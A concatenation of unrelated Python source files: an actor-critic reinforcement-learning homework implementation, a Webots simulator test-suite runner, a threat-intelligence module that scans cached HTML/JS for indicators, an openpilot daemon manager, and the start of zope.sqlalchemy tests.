def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR HW2 CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_HW2 CODE_HERE
sy_logits_na = build_mlp(
sy_ob_no,
output_size=self.ac_dim,
scope="nn",
n_layers=self.n_layers,
size=self.size,
activation=tf.nn.tanh,
)
return sy_logits_na
else:
# YOUR_HW2 CODE_HERE
sy_mean = build_mlp(
sy_ob_no,
output_size=self.ac_dim,
scope="nn",
n_layers=self.n_layers,
size=self.size,
activation=tf.nn.tanh,
)
sy_logstd = tf.get_variable(name="logstd", shape=[self.ac_dim])
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_HW2 CODE_HERE
sy_sampled_ac = tf.squeeze(
tf.multinomial(sy_logits_na, num_samples=1),
axis=[1])
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_HW2 CODE_HERE
z = tf.random_normal(shape=tf.shape(sy_mean))
sy_sampled_ac = sy_mean + tf.multiply(tf.exp(sy_logstd), z)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_HW2 CODE_HERE
sy_logprob_n = - tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na, logits=sy_logits_na)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_HW2 CODE_HERE
distribution = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd))
sy_logprob_n = distribution.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
# YOUR HW2 CODE HERE
ac = self.sess.run(self.sy_sampled_ac,
feed_dict={self.sy_ob_no: ob[np.newaxis, :]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
q_n = re_n + (1.0 - terminal_n) * self.gamma * self.sess.run(
self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
adv_n = q_n - self.sess.run(
self.critic_prediction, feed_dict={self.sy_ob_no: ob_no})
if self.normalize_advantages:
# YOUR_HW2 CODE_HERE
adv_n = (adv_n - np.mean(adv_n)) / np.std(adv_n)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
# Use a bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
for i in range(self.num_target_updates):
target_n = re_n + (1.0 - terminal_n) * self.gamma * self.sess.run(
self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
for j in range(self.num_grad_steps_per_target_update):
self.sess.run(self.critic_update_op, feed_dict={
self.sy_ob_no: ob_no,
self.sy_target_n: target_n,
})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage by, calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
test_suite.py | #!/usr/bin/env python
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite."""
import sys
import os
import shutil
import platform
import datetime
import getpass
import glob
import subprocess
import threading
import time
import multiprocessing
from command import Command
# monitor failures
failures = 0
# parse arguments
filesArguments = []
nomakeOption = False
ansiEscape = True
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
if arg == '--nomake':
nomakeOption = True
elif arg == '--no-ansi-escape':
ansiEscape = False
elif os.path.exists(arg):
filesArguments.append(arg)
else:
raise RuntimeError('Unknown option "' + arg + '"')
testGroups = ['api', 'physics', 'protos', 'parser', 'rendering']
# global files
testsFolderPath = os.path.dirname(os.path.abspath(__file__)) + os.sep
outputFilename = testsFolderPath + 'output.txt'
defaultProjectPath = testsFolderPath + 'default' + os.sep
supervisorControllerName = 'test_suite_supervisor'
protoFileNames = ['TestSuiteSupervisor.proto', 'TestSuiteEmitter.proto']
tempWorldCounterFilename = testsFolderPath + 'world_counter.txt'
webotsStdOutFilename = testsFolderPath + 'webots_stdout.txt'
webotsStdErrFilename = testsFolderPath + 'webots_stderr.txt'
# Webots setup (cf. setupWebots() below)
webotsFullPath = ''
webotsVersion = ''
def setupWebots():
"""Find webots binary thanks to WEBOTS_HOME."""
os.putenv('WEBOTS_TEST_SUITE', 'TRUE')
os.putenv('WEBOTS_EMPTY_PROJECT_PATH', defaultProjectPath)
global webotsFullPath
global webotsVersion
global webotsSysInfo
if sys.platform == 'win32':
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + 'msys64' + \
os.sep + 'mingw64' + os.sep + 'bin' + os.sep + 'webots.exe'
else:
webotsBinary = 'webots'
if 'WEBOTS_HOME' in os.environ:
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + webotsBinary
else:
webotsFullPath = '..' + os.sep + '..' + os.sep + webotsBinary
if not os.path.isfile(webotsFullPath):
print('Error: ' + webotsBinary + ' binary not found')
if sys.platform == 'win32':
sys.stdout.flush()
sys.exit(1)
webotsFullPath = os.path.normpath(webotsFullPath)
command = Command(webotsFullPath + ' --version')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots version')
webotsVersion = command.output.replace('\n', ' ').split(' ')[2].split('.')
command = Command(webotsFullPath + ' --sysinfo')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots information of the system')
webotsSysInfo = command.output.split('\n')
def findFirstWorldFilename(worldsFilename):
"""Get the first world file name."""
file = open(worldsFilename)
worldFilename = file.readline().strip()
file.close()
return worldFilename
def resetIndexFile(indexFilename):
"""Create the index file."""
file = open(indexFilename, 'w')
file.write('0\n')
file.close()
def formatString(s):
"""Add a predefined number of spaces after the ':' character."""
try:
index = s.index(': ')
s0 = '{:<20}'.format(s[0:index])
s0 += s[index:]
return s0
except ValueError: # can be thrown by string.index()
return s
def resetOutputFile():
"""Create the output file."""
file = open(outputFilename, 'w')
file.write(formatString('Webots binary: ' + webotsFullPath) + '\n')
file.write(formatString('Webots version: ' + str(webotsVersion)) + '\n')
file.write(formatString(
'Operating System: ' + platform.platform() +
' [' + platform.machine() + '] ' + platform.processor() +
' (' + platform.node() + ')') + '\n'
)
file.write(formatString('Date: ' + datetime.datetime.now().ctime()) + '\n')
file.write(formatString('Tester: ' + getpass.getuser()) + '\n')
for line in webotsSysInfo:
file.write(formatString(line) + '\n')
file.close()
def appendToOutputFile(txt):
"""Append txt to output file."""
file = open(outputFilename, 'a')
file.write(txt)
file.close()
def executeMake():
"""Execute 'make release' to ensure every controller/plugin is compiled."""
curdir = os.getcwd()
os.chdir(testsFolderPath)
command = Command('make release -j%d' % multiprocessing.cpu_count())
command.run(silent=False)
os.chdir(curdir)
if command.returncode != 0:
raise RuntimeError('Error when executing the Make command')
def generateWorldsList(groupName, worldsFilename):
"""Generate the list of worlds to run."""
f = open(worldsFilename, 'w')
worldsCount = 0
# generate the list from the arguments
if filesArguments:
for file in filesArguments:
if file.startswith(groupName):
f.write(file + '\n')
worldsCount = len(filesArguments)
# generate the list from 'ls worlds/*.wbt'
else:
filenames = glob.glob(testsFolderPath + groupName + os.sep + 'worlds' + os.sep + '*.wbt')
# remove the generic name
for filename in filenames:
if filename.endswith('test_suite'):
filenames.remove(filename)
# alphabetical order
filenames.sort()
# to file
for filename in filenames:
# speaker test not working on travis/github action because of missing sound drivers
if (not filename.endswith('_temp.wbt') and
not (('TRAVIS' in os.environ or 'GITHUB_ACTIONS' in os.environ) and filename.endswith('speaker.wbt'))):
f.write(filename + '\n')
worldsCount += 1
f.close()
return worldsCount
def monitorOutputFile(finalMessage):
"""Display the output file on the console."""
global monitorOutputCommand
monitorOutputCommand = Command('tail -f ' + outputFilename, ansiEscape)
monitorOutputCommand.run(expectedString=finalMessage, silent=False)
if not nomakeOption:
executeMake()
setupWebots()
resetOutputFile()
finalMessage = 'Test suite complete'
thread = threading.Thread(target=monitorOutputFile, args=[finalMessage])
thread.start()
webotsArguments = '--mode=fast --stdout --stderr --minimize --batch'
if sys.platform != 'win32':
webotsArguments += ' --no-sandbox'
for groupName in testGroups:
testFailed = False
appendToOutputFile('\n### ' + groupName + ' test\n\n')
# clear stdout and stderr files
open(webotsStdErrFilename, 'w').close()
open(webotsStdOutFilename, 'w').close()
worldsFilename = testsFolderPath + groupName + os.sep + 'worlds.txt'
indexFilename = testsFolderPath + groupName + os.sep + 'worlds_index.txt'
# init temporary world counter file
tempFile = open(tempWorldCounterFilename, 'w')
tempFile.write('0')
tempFile.close()
supervisorTargetDirectory = testsFolderPath + groupName + os.sep + 'controllers' + os.sep + \
supervisorControllerName
if not os.path.exists(supervisorTargetDirectory):
os.makedirs(supervisorTargetDirectory)
shutil.copyfile(
defaultProjectPath + 'controllers' + os.sep +
supervisorControllerName + os.sep +
supervisorControllerName + '.py',
supervisorTargetDirectory + os.sep + supervisorControllerName + '.py'
)
# parser tests uses a slightly different Supervisor PROTO
protosTargetDirectory = testsFolderPath + groupName + os.sep + 'protos'
protosSourceDirectory = defaultProjectPath + 'protos' + os.sep
if not os.path.exists(protosTargetDirectory):
os.makedirs(protosTargetDirectory)
for protoFileName in protoFileNames:
shutil.copyfile(protosSourceDirectory + protoFileName,
protosTargetDirectory + os.sep + protoFileName)
worldsCount = generateWorldsList(groupName, worldsFilename)
firstSimulation = findFirstWorldFilename(worldsFilename)
if not os.path.exists(firstSimulation):
continue
resetIndexFile(indexFilename)
# Here is an example to run webots in gdb and display the stack
# when it crashes.
# this is particuarliy useful to debug on the jenkins server
# command = Command('gdb -ex run --args ' + webotsFullPath + '-bin ' +
# firstSimulation + ' --mode=fast --minimize')
# command.run(silent = False)
command = Command(webotsFullPath + ' ' + firstSimulation + ' ' + webotsArguments)
# redirect stdout and stderr to files
command.runTest(timeout=10 * 60) # 10 minutes
if command.isTimeout or command.returncode != 0:
if command.isTimeout:
failures += 1
appendToOutputFile(
'FAILURE: Webots has been terminated ' +
'by the test suite script\n')
else:
failures += 1
appendToOutputFile(
'FAILURE: Webots exits abnormally with this error code: ' +
str(command.returncode) + '\n')
testFailed = True
else:
# check count of executed worlds
tempFile = open(tempWorldCounterFilename)
counterString = tempFile.read()
tempFile.close()
if int(counterString) < worldsCount:
testFailed = True
appendToOutputFile('FAILURE: Some tests have not been executed\n')
appendToOutputFile('- expected number of worlds: %d\n' % (worldsCount))
appendToOutputFile('- number of worlds actually tested: %s)\n' % (counterString))
else:
with open(webotsStdErrFilename, 'r') as file:
if 'Failure' in file.read():
failures += 1
if testFailed:
appendToOutputFile('\nWebots complete STDOUT log:\n')
with open(webotsStdOutFilename) as f:
for line in f:
appendToOutputFile(line)
appendToOutputFile('\nWebots complete STDERR log:\n')
with open(webotsStdErrFilename) as f:
for line in f:
appendToOutputFile(line)
if '(core dumped)' in line:
l = line[0:line.find(' Segmentation fault')]
pid = int(l[l.rfind(' ') + 1:])
core_dump_file = '/tmp/core_webots-bin.' + str(pid)
if os.path.exists(core_dump_file):
appendToOutputFile(subprocess.check_output([
'gdb', '--batch', '--quiet', '-ex', 'bt', '-ex',
'quit', '../bin/webots-bin', core_dump_file
]))
os.remove(core_dump_file)
else:
appendToOutputFile(
'Cannot get the core dump file: "%s" does not exist.' % core_dump_file
)
appendToOutputFile('\n' + finalMessage + '\n')
time.sleep(1)
if monitorOutputCommand.isRunning():
monitorOutputCommand.terminate(force=True)
with open(outputFilename, 'r') as file:
content = file.read()
failures += content.count('FAILURE ')
sys.exit(failures)
|
html_js_cache.py | import os
import time
import json
import logging
import threading
from threading import Lock, Thread
from configparser import ConfigParser
from lib.constants import FA_HOME
from lib.modules import base_module
log = logging.getLogger()
class HtmlJsCache(base_module.BaseModule):
def __init__(self):
super().__init__(name='HtmlJsCache')
log.info('Initializing HtmlJsCache module.')
self.config = ConfigParser()
self.config.read(os.path.join(FA_HOME, "etc", "config.ini"))
# Read any configuration options you have specified in config.ini
self.html_cache_path = self.config['module_html_js_cache']['html_cache']
self.js_cache_path = self.config['module_html_js_cache']['js_cache']
self.running = False
self.crits_data = {
'module_status' : 'initialized',
'indicators' : {}
}
def run(self):
self.running = True
with self.data_lock:
self.crits_data['module_status'] = 'running'
while self.running:
# We need to find indicators that haven't been processed already
with self.data_lock:
# Create a list of CRITs object IDs.
cid_list = list(self.crits_data['indicators'].keys())
unprocessed_cids = []
for cid in cid_list:
with self.data_lock:
if not self.crits_data['indicators'][cid]['completed']:
unprocessed_cids.append(cid)
# Now we can start a thread to process them
if len(unprocessed_cids) > 0:
# YOUR CODE HERE to process indicators
thread = Thread(target=self.scan_cache, name='HtmlJsCacheScanner')
thread.start()
while thread.is_alive() and self.running:
time.sleep(2)
else:
time.sleep(2)
def scan_cache(self):
with self.data_lock:
cid_list = list(self.crits_data['indicators'].keys())
for cid in cid_list:
# Ignore processed indicators
with self.data_lock:
if self.crits_data['indicators'][cid]['completed']:
continue
# Figure out which cache path to use based on the indicator type.
with self.data_lock:
indicator_type = self.crits_data['indicators'][cid]['type']
indicator_value = self.crits_data['indicators'][cid]['value']
cache_path = ''
if 'JS' in indicator_type:
log.info('Scanning JS cache for indicator {}'.format(cid))
cache_path = self.js_cache_path
else:
log.info('Scanning HTML cache for indicator {}'.format(cid))
cache_path = self.html_cache_path
if cache_path:
cached_files = os.listdir(cache_path)
cached_files = [os.path.join(cache_path, f) for f in cached_files]
#observables = []
results = []
for cached_file in cached_files:
try:
with open(cached_file) as f:
text = f.read()
# If we found the indicator, add the URL as a result.
if indicator_value in text:
data = json.loads(text)
#observables.append({'type': 'url', 'value': url})
results.append(data['url'])
except:
pass
# If we got results (i.e.: indicator found in the cache), set the
# indicator results to the list of URLs that hit and mark the status.
if len(results) > 0:
log.info('Cache hit {} times for indicator {}'.format(len(results), cid))
with self.data_lock:
if 'results' not in self.crits_data['indicators'][cid]:
self.crits_data['indicators'][cid]['results'] = []
if 'observables' not in self.crits_data['indicators'][cid]:
self.crits_data['indicators'][cid]['observables'] = []
results_data = {}
results_data['hits'] = results
results_data['total_hits'] = len(results)
self.crits_data['indicators'][cid]['results'].append(results_data)
# Since we had results, set the status to In Progress and completed.
self.crits_data['indicators'][cid]['status'] = 'In Progress'
self.crits_data['indicators'][cid]['completed'] = True
# Since we did not get any results, turn the indicator on.
else:
log.info('Cache did not hit for indicator {}. Turning it on.'.format(cid))
self.crits_data['indicators'][cid]['status'] = 'Analyzed'
self.crits_data['indicators'][cid]['completed'] = True
def stop(self):
log.warning("Caught interrupt. Shutting down HtmlJsCache...")
self.running = False
def set_crits_data(self, crits_data):
with self.data_lock:
self.crits_data = crits_data
def get_valid_indicator_types(self):
# This returns a list of acceptible CRITs indicators types for this
# module. Include ONLY types that your module is able to process!
return [
'String - HTML',
'String - JS',
'URI - Path'
]
def poll(self):
with self.data_lock:
return self.crits_data
|
manage_athenad.py | #!/usr/bin/env python3
import time
from multiprocessing import Process
import selfdrive.crash as crash
from common.params import Params
from selfdrive.manager.process import launcher
from selfdrive.swaglog import cloudlog
from selfdrive.version import version, dirty
ATHENA_MGR_PID_PARAM = "AthenadPid"
def main():
params = Params()
dongle_id = params.get("DongleId").decode('utf-8')
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty)
crash.install()
try:
while 1:
cloudlog.info("starting athena daemon")
proc = Process(name='athenad', target=launcher, args=('selfdrive.athena.athenad',))
proc.start()
proc.join()
cloudlog.event("athenad exited", exitcode=proc.exitcode)
time.sleep(5)
except Exception:
cloudlog.exception("manage_athenad.exception")
finally:
params.delete(ATHENA_MGR_PID_PARAM)
if __name__ == '__main__':
main()
|
tests.py | ##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
# Much inspiration from z3c.sqlalchemy/trunk/src/z3c/sqlalchemy/tests/testSQLAlchemy.py
#
# You may want to run the tests with your database. To do so set the environment variable
# TEST_DSN to the connection url. e.g.:
# export TEST_DSN=postgres://plone:plone@localhost/test
# export TEST_DSN=mssql://plone:plone@/test?dsn=mydsn
#
# To test in twophase commit mode export TEST_TWOPHASE=True
#
# NOTE: The sqlite that ships with Mac OS X 10.4 is buggy. Install a newer version (3.5.6)
# and rebuild pysqlite2 against it.
import sys
PY3 = sys.version_info[0] == 3
def u(s):
if PY3:
return s
else:
return s.decode('utf-8')
def b(s):
if PY3:
return s.encode('utf-8')
else:
return s
import os
import re
import unittest
import transaction
import threading
import time
from transaction._transaction import Status as ZopeStatus
from transaction.interfaces import TransactionFailedError
import sqlalchemy as sa
from sqlalchemy import orm, sql, exc
from zope.sqlalchemy import datamanager as tx
from zope.sqlalchemy import mark_changed
from zope.testing.renormalizing import RENormalizing
TEST_TWOPHASE = bool(os.environ.get('TEST_TWOPHASE'))
TEST_DSN = os.environ.get('TEST_DSN', 'sqlite:///:memory:')
class SimpleModel(object):
def __init__(self, **kw):
for k, v in kw.items():
setattr(self, k, v)
